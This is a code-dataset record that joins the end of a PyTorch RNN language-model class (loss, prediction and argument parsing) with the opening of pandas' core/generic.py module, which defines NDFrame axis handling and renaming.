batch, _ = self.hid(batch)
# Transform from hidden dimension to embedding dimension.
# Input shape: `(B, S, H)`.
# Output shape: `(B, S, E)`.
batch = self.post_hid(batch)
# Transform from embedding dimension to vocabulary dimension by
# multiplying transpose of embedding matrix.
# Reduce model parameters by sharing embedding matrix with output.
# Input shape: `(B, S, E)`.
# Output shape: `(B, S, V)`.
return batch @ self.emb.weight.transpose(0, 1)
def loss_fn(
self,
batch_next_tkids: torch.Tensor,
batch_prev_tkids: torch.Tensor,
) -> torch.Tensor:
r"""Calculate language model training loss.
Use forward pass to get logits and then use cross-entropy to calculate
next token prediction loss.
Use teacher forcing to implement this method.
Parameters
==========
batch_next_tkids: torch.Tensor
Prediction targets.
Batch of next token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_next_tkids`` has same shape and ``dtype`` as
``batch_prev_tkids``.
batch_prev_tkids: torch.Tensor
Batch of previous token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_prev_tkids`` has shape ``(B, S)`` and
``dtype == torch.int64``.
Returns
=======
torch.Tensor
Average next token prediction loss.
Returned tensor has shape ``(1)`` and ``dtype == torch.float32``.
"""
# Forward pass.
# Input shape: `(B, S)`.
# Output shape: `(B, S, V)`.
logits = self(batch_prev_tkids)
# Reshape logits to calculate loss.
# Input shape: `(B, S, V)`.
# Output shape: `(BxS, V)`.
logits = logits.reshape(-1, self.emb.num_embeddings)
# Reshape target to calculate loss.
# Input shape: `(B, S)`.
# Output shape: `(BxS)`.
batch_next_tkids = batch_next_tkids.reshape(-1)
# Loss function of next token prediction.
# All logits are used since we use teacher forcing to optimize.
# Logits tensor: Batch of next token prediction logits.
# Logits shape : `(BxS, V)`.
# Logits dtype : `torch.float32`.
# Target tensor: Batch of next token prediction target.
# Target shape : `(BxS)`.
# Target dtype : `torch.int64`.
# Output tensor: Average next tokens prediction loss.
# Output shape : `(1)`.
# Output dtype : `torch.float32`.
return self.loss_ignore_padding(logits, batch_next_tkids)
def pred(self, batch_prev_tkids: torch.Tensor) -> torch.Tensor:
r"""Next token prediction.
Use the forward pass output logits to choose the most probable token id
from the vocabulary as the next token.
Parameters
==========
batch_prev_tkids: torch.Tensor
Batch of previous token ids encoded by
:py:class:`lmp.tknzr.BaseTknzr` subclass instance.
``batch_prev_tkids`` has shape ``(B, S)`` and
``dtype == torch.int64``.
Returns
=======
torch.Tensor
Softmax prediction for the next token.
Return tensor has shape ``(B, S, V)`` and
``dtype == torch.float32``.
"""
# Forward pass.
# Input shape: `(B, S)`.
# Output shape: `(B, S, V)`.
logits = self(batch_prev_tkids)
# Convert logits to probabilities using softmax.
# Input tensor : Batch of next token prediction logits.
# Input shape : `(B, S, V)`.
# Input dtype : `torch.float32`.
# Output tensor: Batch of next token prediction probabilities.
# Output shape : `(B, S, V)`.
# Output dtype : `torch.float32`.
return F.softmax(logits, dim=-1)
@staticmethod
def train_parser(parser: argparse.ArgumentParser) -> None:
r"""Training vanilla RNN language model CLI arguments parser.
Parameters
==========
parser: argparse.ArgumentParser
Parser for CLI arguments.
See Also
========
lmp.model.BaseModel.train_parser
Training language model CLI arguments.
lmp.script.train_model
Language model training script.
Examples
========
>>> import argparse
>>> from lmp.model import RNNModel
>>> parser = argparse.ArgumentParser()
>>> RNNModel.train_parser(parser)
>>> args = parser.parse_args([
... '--batch_size', '32',
... '--beta1', '0.9',
... '--beta2', '0.99',
... '--ckpt_step', '1000',
... '--dset_name', 'wikitext-2',
... '--eps', '1e-8',
... '--exp_name', 'my_exp',
... '--log_step', '200',
... '--lr', '1e-4',
... '--max_norm', '1',
... '--n_epoch', '10',
... '--tknzr_exp_name', 'my_tknzr_exp',
... '--ver', 'train',
... '--wd', '1e-2',
... '--d_emb', '100',
... '--d_hid', '300',
... '--n_hid_lyr', '2',
... '--n_post_hid_lyr', '1',
... '--n_pre_hid_lyr', '1',
... '--p_emb', '0.1',
... '--p_hid', '0.1',
... ])
>>> args.d_emb == 100
True
>>> args.d_hid == 300
True
>>> args.n_hid_lyr == 2
True
>>> args.n_post_hid_lyr == 1
True
>>> args.n_pre_hid_lyr == 1
True
>>> args.p_emb == 0.1
True
>>> args.p_hid == 0.1
True
"""
# Load common arguments.
BaseModel.train_parser(parser=parser)
# Required arguments.
group = parser.add_argument_group('model arguments')
group.add_argument(
'--d_emb',
help='Token embedding dimension.',
required=True,
type=int,
)
group.add_argument(
'--d_hid',
help='Hidden dimension for Feed-Forward layers and RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--n_hid_lyr',
help='Number of RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--n_post_hid_lyr',
help='Number of Feed-Forward layers after RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--n_pre_hid_lyr',
help='Number of Feed-Forward layers before RNN layers.',
required=True,
type=int,
)
group.add_argument(
'--p_emb',
help='Dropout probability for token embeddings.',
required=True,
type=float,
)
group.add_argument(
'--p_hid',
help='Dropout probability for hidden representation.',
required=True,
type=float,
)
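# Illustrative shape check (an addition, not from the original module). It demonstrates
# the weight-tying step used in RNNModel.forward: hidden states are projected back to
# vocabulary logits by multiplying with the transposed embedding matrix, so no separate
# output projection parameters are needed.
if __name__ == '__main__':
    B, S, E, V = 2, 5, 8, 11  # batch size, sequence length, embedding dim, vocab size
    emb = nn.Embedding(num_embeddings=V, embedding_dim=E)
    hidden = torch.rand(B, S, E)  # stands in for the output of `self.post_hid`
    logits = hidden @ emb.weight.transpose(0, 1)
    assert logits.shape == (B, S, V)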
| 36.578761
| 79
| 0.515217
|
80885fd9ef1392e5c4fcc253964789d5546497fb
| 326,332
|
py
|
Python
|
pandas/core/generic.py
|
Web-Application-Project/Main-Project
|
9183396ec9ab660a49bc6bd41cfd2bbc98f54db7
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/core/generic.py
|
Web-Application-Project/Main-Project
|
9183396ec9ab660a49bc6bd41cfd2bbc98f54db7
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/core/generic.py
|
Web-Application-Project/Main-Project
|
9183396ec9ab660a49bc6bd41cfd2bbc98f54db7
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
# pylint: disable=W0231,E1101
import collections
import functools
import warnings
import operator
import weakref
import gc
import json
import numpy as np
import pandas as pd
from pandas._libs import tslib, properties
from pandas.core.dtypes.common import (
_ensure_int64,
_ensure_object,
is_scalar,
is_number,
is_integer, is_bool,
is_bool_dtype,
is_categorical_dtype,
is_numeric_dtype,
is_datetime64_dtype,
is_timedelta64_dtype,
is_datetime64tz_dtype,
is_list_like,
is_dict_like,
is_re_compilable,
is_period_arraylike,
pandas_dtype)
from pandas.core.dtypes.cast import maybe_promote, maybe_upcast_putmask
from pandas.core.dtypes.inference import is_hashable
from pandas.core.dtypes.missing import isna, notna
from pandas.core.dtypes.generic import ABCSeries, ABCPanel, ABCDataFrame
from pandas.core.base import PandasObject, SelectionMixin
from pandas.core.index import (Index, MultiIndex, _ensure_index,
InvalidIndexError, RangeIndex)
import pandas.core.indexing as indexing
from pandas.core.indexing import maybe_convert_indices
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import PeriodIndex, Period
from pandas.core.internals import BlockManager
import pandas.core.algorithms as algos
import pandas.core.common as com
import pandas.core.missing as missing
from pandas.io.formats.printing import pprint_thing
from pandas.io.formats.format import format_percentiles, DataFrameFormatter
from pandas.tseries.frequencies import to_offset
from pandas import compat
from pandas.compat.numpy import function as nv
from pandas.compat import (map, zip, lzip, lrange, string_types, to_str,
isidentifier, set_function_name, cPickle as pkl)
from pandas.core.ops import _align_method_FRAME
import pandas.core.nanops as nanops
from pandas.util._decorators import (Appender, Substitution,
deprecate_kwarg)
from pandas.util._validators import validate_bool_kwarg, validate_fillna_kwargs
from pandas.core import config
# goal is to be able to define the docs close to function, while still being
# able to share
_shared_docs = dict()
_shared_doc_kwargs = dict(
axes='keywords for axes', klass='NDFrame',
axes_single_arg='int or labels for object',
args_transpose='axes to permute (int or label for object)',
optional_by="""
by : str or list of str
Name or list of names to sort by""")
def _single_replace(self, to_replace, method, inplace, limit):
"""
Replaces values in a Series using the fill method specified when no
replacement value is given in the replace method
"""
if self.ndim != 1:
raise TypeError('cannot replace {0} with method {1} on a {2}'
.format(to_replace, method, type(self).__name__))
orig_dtype = self.dtype
result = self if inplace else self.copy()
fill_f = missing.get_fill_func(method)
mask = missing.mask_missing(result.values, to_replace)
values = fill_f(result.values, limit=limit, mask=mask)
if values.dtype == orig_dtype and inplace:
return
result = pd.Series(values, index=self.index,
dtype=self.dtype).__finalize__(self)
if inplace:
self._update_inplace(result._data)
return
return result
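# Illustrative note (an addition, not from the original pandas source): _single_replace
# backs the fill-method form of Series.replace, e.g. replacing zeros by propagating the
# previous value forward:
#     pd.Series([1, 0, 0, 3]).replace(0, method='ffill')  ->  values [1, 1, 1, 3]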
class NDFrame(PandasObject, SelectionMixin):
"""
N-dimensional analogue of DataFrame. Store multi-dimensional data in a
size-mutable, labeled data structure.
Parameters
----------
data : BlockManager
axes : list
copy : boolean, default False
"""
_internal_names = ['_data', '_cacher', '_item_cache', '_cache', '_is_copy',
'_subtyp', '_name', '_index', '_default_kind',
'_default_fill_value', '_metadata', '__array_struct__',
'__array_interface__']
_internal_names_set = set(_internal_names)
_accessors = frozenset([])
_deprecations = frozenset(['as_blocks', 'blocks',
'consolidate', 'convert_objects', 'is_copy'])
_metadata = []
_is_copy = None
def __init__(self, data, axes=None, copy=False, dtype=None,
fastpath=False):
if not fastpath:
if dtype is not None:
data = data.astype(dtype)
elif copy:
data = data.copy()
if axes is not None:
for i, ax in enumerate(axes):
data = data.reindex_axis(ax, axis=i)
object.__setattr__(self, '_is_copy', None)
object.__setattr__(self, '_data', data)
object.__setattr__(self, '_item_cache', {})
@property
def is_copy(self):
warnings.warn("Attribute 'is_copy' is deprecated and will be removed "
"in a future version.", FutureWarning, stacklevel=2)
return self._is_copy
@is_copy.setter
def is_copy(self, msg):
warnings.warn("Attribute 'is_copy' is deprecated and will be removed "
"in a future version.", FutureWarning, stacklevel=2)
self._is_copy = msg
def _repr_data_resource_(self):
"""
Not a real Jupyter special repr method, but we use the same
naming convention.
"""
if config.get_option("display.html.table_schema"):
data = self.head(config.get_option('display.max_rows'))
payload = json.loads(data.to_json(orient='table'),
object_pairs_hook=collections.OrderedDict)
return payload
def _validate_dtype(self, dtype):
""" validate the passed dtype """
if dtype is not None:
dtype = pandas_dtype(dtype)
# a compound dtype
if dtype.kind == 'V':
raise NotImplementedError("compound dtypes are not implemented"
" in the {0} constructor"
.format(self.__class__.__name__))
return dtype
def _init_mgr(self, mgr, axes=None, dtype=None, copy=False):
""" passed a manager and a axes dict """
for a, axe in axes.items():
if axe is not None:
mgr = mgr.reindex_axis(axe,
axis=self._get_block_manager_axis(a),
copy=False)
# make a copy if explicitly requested
if copy:
mgr = mgr.copy()
if dtype is not None:
# avoid further copies if we can
if len(mgr.blocks) > 1 or mgr.blocks[0].values.dtype != dtype:
mgr = mgr.astype(dtype=dtype)
return mgr
# ----------------------------------------------------------------------
# Construction
@property
def _constructor(self):
"""Used when a manipulation result has the same dimensions as the
original.
"""
raise com.AbstractMethodError(self)
def __unicode__(self):
# unicode representation based upon iterating over self
# (since, by definition, `PandasContainers` are iterable)
prepr = '[%s]' % ','.join(map(pprint_thing, self))
return '%s(%s)' % (self.__class__.__name__, prepr)
def _dir_additions(self):
""" add the string-like attributes from the info_axis.
If info_axis is a MultiIndex, its first-level values are used.
"""
additions = {c for c in self._info_axis.unique(level=0)[:100]
if isinstance(c, string_types) and isidentifier(c)}
return super(NDFrame, self)._dir_additions().union(additions)
@property
def _constructor_sliced(self):
"""Used when a manipulation result has one lower dimension(s) as the
original, such as DataFrame single columns slicing.
"""
raise com.AbstractMethodError(self)
@property
def _constructor_expanddim(self):
"""Used when a manipulation result has one higher dimension as the
original, such as Series.to_frame() and DataFrame.to_panel()
"""
raise NotImplementedError
# ----------------------------------------------------------------------
# Axis
@classmethod
def _setup_axes(cls, axes, info_axis=None, stat_axis=None, aliases=None,
slicers=None, axes_are_reversed=False, build_axes=True,
ns=None, docs=None):
"""Provide axes setup for the major PandasObjects.
Parameters
----------
axes : the names of the axes in order (lowest to highest)
info_axis : the axis of the selector dimension (int)
stat_axis : the axis used for the default statistics (int)
aliases : other names for a single axis (dict)
slicers : how axes slice to others (dict)
axes_are_reversed : boolean whether to treat passed axes as
reversed (DataFrame)
build_axes : setup the axis properties (default True)
"""
cls._AXIS_ORDERS = axes
cls._AXIS_NUMBERS = {a: i for i, a in enumerate(axes)}
cls._AXIS_LEN = len(axes)
cls._AXIS_ALIASES = aliases or dict()
cls._AXIS_IALIASES = {v: k for k, v in cls._AXIS_ALIASES.items()}
cls._AXIS_NAMES = dict(enumerate(axes))
cls._AXIS_SLICEMAP = slicers or None
cls._AXIS_REVERSED = axes_are_reversed
# typ
setattr(cls, '_typ', cls.__name__.lower())
# indexing support
cls._ix = None
if info_axis is not None:
cls._info_axis_number = info_axis
cls._info_axis_name = axes[info_axis]
if stat_axis is not None:
cls._stat_axis_number = stat_axis
cls._stat_axis_name = axes[stat_axis]
# setup the actual axis
if build_axes:
def set_axis(a, i):
setattr(cls, a, properties.AxisProperty(i, docs.get(a, a)))
cls._internal_names_set.add(a)
if axes_are_reversed:
m = cls._AXIS_LEN - 1
for i, a in cls._AXIS_NAMES.items():
set_axis(a, m - i)
else:
for i, a in cls._AXIS_NAMES.items():
set_axis(a, i)
# additional parameters
if isinstance(ns, dict):
for k, v in ns.items():
setattr(cls, k, v)
def _construct_axes_dict(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {a: self._get_axis(a) for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
@staticmethod
def _construct_axes_dict_from(self, axes, **kwargs):
"""Return an axes dictionary for the passed axes."""
d = {a: ax for a, ax in zip(self._AXIS_ORDERS, axes)}
d.update(kwargs)
return d
def _construct_axes_dict_for_slice(self, axes=None, **kwargs):
"""Return an axes dictionary for myself."""
d = {self._AXIS_SLICEMAP[a]: self._get_axis(a)
for a in (axes or self._AXIS_ORDERS)}
d.update(kwargs)
return d
def _construct_axes_from_arguments(self, args, kwargs, require_all=False):
"""Construct and returns axes if supplied in args/kwargs.
If require_all, raise if all axis arguments are not supplied
return a tuple of (axes, kwargs).
"""
# construct the args
args = list(args)
for a in self._AXIS_ORDERS:
# if we have an alias for this axis
alias = self._AXIS_IALIASES.get(a)
if alias is not None:
if a in kwargs:
if alias in kwargs:
raise TypeError("arguments are mutually exclusive "
"for [%s,%s]" % (a, alias))
continue
if alias in kwargs:
kwargs[a] = kwargs.pop(alias)
continue
# look for an argument by position
if a not in kwargs:
try:
kwargs[a] = args.pop(0)
except IndexError:
if require_all:
raise TypeError("not enough/duplicate arguments "
"specified!")
axes = {a: kwargs.pop(a, None) for a in self._AXIS_ORDERS}
return axes, kwargs
@classmethod
def _from_axes(cls, data, axes, **kwargs):
# for construction from BlockManager
if isinstance(data, BlockManager):
return cls(data, **kwargs)
else:
if cls._AXIS_REVERSED:
axes = axes[::-1]
d = cls._construct_axes_dict_from(cls, axes, copy=False)
d.update(kwargs)
return cls(data, **d)
def _get_axis_number(self, axis):
axis = self._AXIS_ALIASES.get(axis, axis)
if is_integer(axis):
if axis in self._AXIS_NAMES:
return axis
else:
try:
return self._AXIS_NUMBERS[axis]
except KeyError:
pass
raise ValueError('No axis named {0} for object type {1}'
.format(axis, type(self)))
def _get_axis_name(self, axis):
axis = self._AXIS_ALIASES.get(axis, axis)
if isinstance(axis, string_types):
if axis in self._AXIS_NUMBERS:
return axis
else:
try:
return self._AXIS_NAMES[axis]
except KeyError:
pass
raise ValueError('No axis named {0} for object type {1}'
.format(axis, type(self)))
def _get_axis(self, axis):
name = self._get_axis_name(axis)
return getattr(self, name)
def _get_block_manager_axis(self, axis):
"""Map the axis to the block_manager axis."""
axis = self._get_axis_number(axis)
if self._AXIS_REVERSED:
m = self._AXIS_LEN - 1
return m - axis
return axis
def _get_axis_resolvers(self, axis):
# index or columns
axis_index = getattr(self, axis)
d = dict()
prefix = axis[0]
for i, name in enumerate(axis_index.names):
if name is not None:
key = level = name
else:
# prefix with 'i' or 'c' depending on the input axis
# e.g., you must do ilevel_0 for the 0th level of an unnamed
# multiindex
key = '{prefix}level_{i}'.format(prefix=prefix, i=i)
level = i
level_values = axis_index.get_level_values(level)
s = level_values.to_series()
s.index = axis_index
d[key] = s
# put the index/columns itself in the dict
if isinstance(axis_index, MultiIndex):
dindex = axis_index
else:
dindex = axis_index.to_series()
d[axis] = dindex
return d
def _get_index_resolvers(self):
d = {}
for axis_name in self._AXIS_ORDERS:
d.update(self._get_axis_resolvers(axis_name))
return d
@property
def _info_axis(self):
return getattr(self, self._info_axis_name)
@property
def _stat_axis(self):
return getattr(self, self._stat_axis_name)
@property
def shape(self):
"""Return a tuple of axis dimensions"""
return tuple(len(self._get_axis(a)) for a in self._AXIS_ORDERS)
@property
def axes(self):
"""Return index label(s) of the internal NDFrame"""
# we do it this way because if we have reversed axes, then
# the block manager shows them reversed
return [self._get_axis(a) for a in self._AXIS_ORDERS]
@property
def ndim(self):
"""
Return an int representing the number of axes / array dimensions.
Return 1 if Series. Otherwise return 2 if DataFrame.
See Also
--------
ndarray.ndim
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.ndim
1
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.ndim
2
"""
return self._data.ndim
@property
def size(self):
"""
Return an int representing the number of elements in this object.
Return the number of rows if Series. Otherwise return the number of
rows times number of columns if DataFrame.
See Also
--------
ndarray.size
Examples
--------
>>> s = pd.Series({'a': 1, 'b': 2, 'c': 3})
>>> s.size
3
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.size
4
"""
return np.prod(self.shape)
@property
def _selected_obj(self):
""" internal compat with SelectionMixin """
return self
@property
def _obj_with_exclusions(self):
""" internal compat with SelectionMixin """
return self
def _expand_axes(self, key):
new_axes = []
for k, ax in zip(key, self.axes):
if k not in ax:
if type(k) != ax.dtype.type:
ax = ax.astype('O')
new_axes.append(ax.insert(len(ax), k))
else:
new_axes.append(ax)
return new_axes
def set_axis(self, labels, axis=0, inplace=None):
"""
Assign desired index to given axis.
Indexes for column or row labels can be changed by assigning
a list-like or Index.
.. versionchanged:: 0.21.0
The signature is now `labels` and `axis`, consistent with
the rest of pandas API. Previously, the `axis` and `labels`
arguments were respectively the first and second positional
arguments.
Parameters
----------
labels : list-like, Index
The values for the new index.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to update. The value 0 identifies the rows, and 1
identifies the columns.
inplace : boolean, default None
Whether to return a new %(klass)s instance.
.. warning::
``inplace=None`` currently falls back to True, but in a
future version, will default to False. Use inplace=True
explicitly rather than relying on the default.
Returns
-------
renamed : %(klass)s or None
An object of same type as caller if inplace=False, None otherwise.
See Also
--------
pandas.DataFrame.rename_axis : Alter the name of the index or columns.
Examples
--------
**Series**
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.set_axis(['a', 'b', 'c'], axis=0, inplace=False)
a 1
b 2
c 3
dtype: int64
The original object is not modified.
>>> s
0 1
1 2
2 3
dtype: int64
**DataFrame**
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
Change the row labels.
>>> df.set_axis(['a', 'b', 'c'], axis='index', inplace=False)
A B
a 1 4
b 2 5
c 3 6
Change the column labels.
>>> df.set_axis(['I', 'II'], axis='columns', inplace=False)
I II
0 1 4
1 2 5
2 3 6
Now, update the labels inplace.
>>> df.set_axis(['i', 'ii'], axis='columns', inplace=True)
>>> df
i ii
0 1 4
1 2 5
2 3 6
"""
if is_scalar(labels):
warnings.warn(
'set_axis now takes "labels" as first argument, and '
'"axis" as named parameter. The old form, with "axis" as '
'first parameter and \"labels\" as second, is still supported '
'but will be deprecated in a future version of pandas.',
FutureWarning, stacklevel=2)
labels, axis = axis, labels
if inplace is None:
warnings.warn(
'set_axis currently defaults to operating inplace.\nThis '
'will change in a future version of pandas, use '
'inplace=True to avoid this warning.',
FutureWarning, stacklevel=2)
inplace = True
if inplace:
setattr(self, self._get_axis_name(axis), labels)
else:
obj = self.copy()
obj.set_axis(labels, axis=axis, inplace=True)
return obj
def _set_axis(self, axis, labels):
self._data.set_axis(axis, labels)
self._clear_item_cache()
_shared_docs['transpose'] = """
Permute the dimensions of the %(klass)s
Parameters
----------
args : %(args_transpose)s
copy : boolean, default False
Make a copy of the underlying data. Mixed-dtype data will
always result in a copy
Examples
--------
>>> p.transpose(2, 0, 1)
>>> p.transpose(2, 0, 1, copy=True)
Returns
-------
y : same as input
"""
@Appender(_shared_docs['transpose'] % _shared_doc_kwargs)
def transpose(self, *args, **kwargs):
# construct the args
axes, kwargs = self._construct_axes_from_arguments(args, kwargs,
require_all=True)
axes_names = tuple(self._get_axis_name(axes[a])
for a in self._AXIS_ORDERS)
axes_numbers = tuple(self._get_axis_number(axes[a])
for a in self._AXIS_ORDERS)
# we must have unique axes
if len(axes) != len(set(axes)):
raise ValueError('Must specify %s unique axes' % self._AXIS_LEN)
new_axes = self._construct_axes_dict_from(self, [self._get_axis(x)
for x in axes_names])
new_values = self.values.transpose(axes_numbers)
if kwargs.pop('copy', None) or (len(args) and args[-1]):
new_values = new_values.copy()
nv.validate_transpose_for_generic(self, kwargs)
return self._constructor(new_values, **new_axes).__finalize__(self)
def swapaxes(self, axis1, axis2, copy=True):
"""
Interchange two axes and swap the corresponding values appropriately.
Returns
-------
y : same as input
"""
i = self._get_axis_number(axis1)
j = self._get_axis_number(axis2)
if i == j:
if copy:
return self.copy()
return self
mapping = {i: j, j: i}
new_axes = (self._get_axis(mapping.get(k, k))
for k in range(self._AXIS_LEN))
new_values = self.values.swapaxes(i, j)
if copy:
new_values = new_values.copy()
return self._constructor(new_values, *new_axes).__finalize__(self)
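# Illustrative note (an addition, not from the original pandas source): for a 2-D
# DataFrame, swapaxes(0, 1) amounts to a transpose, e.g.
# pd.DataFrame({'A': [1, 2]}).swapaxes(0, 1) has index ['A'] and columns [0, 1].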
def pop(self, item):
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : str
Column label to be popped
Returns
-------
popped : Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
result = self[item]
del self[item]
try:
result._reset_cacher()
except AttributeError:
pass
return result
def squeeze(self, axis=None):
"""
Squeeze length 1 dimensions.
Parameters
----------
axis : None, integer or string axis name, optional
The axis to squeeze if 1-sized.
.. versionadded:: 0.20.0
Returns
-------
scalar if 1-sized, else original object
"""
axis = (self._AXIS_NAMES if axis is None else
(self._get_axis_number(axis),))
try:
return self.iloc[
tuple(0 if i in axis and len(a) == 1 else slice(None)
for i, a in enumerate(self.axes))]
except Exception:
return self
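# Illustrative note (an addition, not from the original pandas source): squeezing a
# single-column DataFrame returns the underlying Series, e.g.
# pd.DataFrame({'a': [1, 2, 3]}).squeeze() yields the Series [1, 2, 3] named 'a';
# objects that are not 1-sized along the chosen axis are returned unchanged.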
def swaplevel(self, i=-2, j=-1, axis=0):
"""
Swap levels i and j in a MultiIndex on a particular axis
Parameters
----------
i, j : int, string (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
swapped : type of caller (new object)
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
"""
axis = self._get_axis_number(axis)
result = self.copy()
labels = result._data.axes[axis]
result._data.set_axis(axis, labels.swaplevel(i, j))
return result
# ----------------------------------------------------------------------
# Rename
# TODO: define separate funcs for DataFrame, Series and Panel so you can
# get completion on keyword arguments.
_shared_docs['rename'] = """
Alter axes labels using an input function or functions. Function / dict
values must be
unique (1-to-1). Labels not contained in a dict / Series will be left
as-is. Extra labels listed don't throw an error. Alternatively, change
``Series.name`` with a scalar value (Series only).
Parameters
----------
%(optional_mapper)s
%(axes)s : scalar, list-like, dict-like or function, optional
Scalar or list-like will alter the ``Series.name`` attribute,
and raise on DataFrame or Panel.
dict-like or functions are transformations to apply to
that axis' values
%(optional_axis)s
copy : boolean, default True
Also copy underlying data
inplace : boolean, default False
Whether to return a new %(klass)s. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
renamed : %(klass)s (new object)
See Also
--------
pandas.NDFrame.rename_axis
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
Since ``DataFrame`` doesn't have a ``.name`` attribute,
only mapping-type arguments are allowed.
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(2)
Traceback (most recent call last):
...
TypeError: 'int' object is not callable
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
>>> df.rename(index=str, columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
>>> df.rename(index=str, columns={"A": "a", "C": "c"})
a B
0 1 4
1 2 5
2 3 6
Using axis-style parameters
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
See the :ref:`user guide <basics.rename>` for more.
"""
@Appender(_shared_docs['rename'] % dict(axes='axes keywords for this'
' object', klass='NDFrame',
optional_mapper='',
optional_axis=''))
def rename(self, *args, **kwargs):
axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
copy = kwargs.pop('copy', True)
inplace = kwargs.pop('inplace', False)
level = kwargs.pop('level', None)
axis = kwargs.pop('axis', None)
if axis is not None:
axis = self._get_axis_number(axis)
if kwargs:
raise TypeError('rename() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
if com._count_not_none(*axes.values()) == 0:
raise TypeError('must pass an index to rename')
# renamer function if passed a dict
def _get_rename_function(mapper):
if isinstance(mapper, (dict, ABCSeries)):
def f(x):
if x in mapper:
return mapper[x]
else:
return x
else:
f = mapper
return f
self._consolidate_inplace()
result = self if inplace else self.copy(deep=copy)
# start in the axis order to eliminate too many copies
for axis in lrange(self._AXIS_LEN):
v = axes.get(self._AXIS_NAMES[axis])
if v is None:
continue
f = _get_rename_function(v)
baxis = self._get_block_manager_axis(axis)
if level is not None:
level = self.axes[axis]._get_level_number(level)
result._data = result._data.rename_axis(f, axis=baxis, copy=copy,
level=level)
result._clear_item_cache()
if inplace:
self._update_inplace(result._data)
else:
return result.__finalize__(self)
rename.__doc__ = _shared_docs['rename']
def rename_axis(self, mapper, axis=0, copy=True, inplace=False):
"""
Alter the name of the index or columns.
Parameters
----------
mapper : scalar, list-like, optional
Value to set as the axis name attribute.
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis.
copy : boolean, default True
Also copy underlying data.
inplace : boolean, default False
Modifies the object directly, instead of creating a new Series
or DataFrame.
Returns
-------
renamed : Series, DataFrame, or None
The same type as the caller or None if `inplace` is True.
Notes
-----
Prior to version 0.21.0, ``rename_axis`` could also be used to change
the axis *labels* by passing a mapping or scalar. This behavior is
deprecated and will be removed in a future version. Use ``rename``
instead.
See Also
--------
pandas.Series.rename : Alter Series index labels or name
pandas.DataFrame.rename : Alter DataFrame index labels or name
pandas.Index.rename : Set new names on index
Examples
--------
**Series**
>>> s = pd.Series([1, 2, 3])
>>> s.rename_axis("foo")
foo
0 1
1 2
2 3
dtype: int64
**DataFrame**
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename_axis("foo")
A B
foo
0 1 4
1 2 5
2 3 6
>>> df.rename_axis("bar", axis="columns")
bar A B
0 1 4
1 2 5
2 3 6
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
non_mapper = is_scalar(mapper) or (is_list_like(mapper) and not
is_dict_like(mapper))
if non_mapper:
return self._set_axis_name(mapper, axis=axis, inplace=inplace)
else:
msg = ("Using 'rename_axis' to alter labels is deprecated. "
"Use '.rename' instead")
warnings.warn(msg, FutureWarning, stacklevel=2)
axis = self._get_axis_name(axis)
d = {'copy': copy, 'inplace': inplace}
d[axis] = mapper
return self.rename(**d)
def _set_axis_name(self, name, axis=0, inplace=False):
"""
Alter the name or names of the axis.
Parameters
----------
name : str or list of str
Name for the Index, or list of names for the MultiIndex
axis : int or str
0 or 'index' for the index; 1 or 'columns' for the columns
inplace : bool
whether to modify `self` directly or return a copy
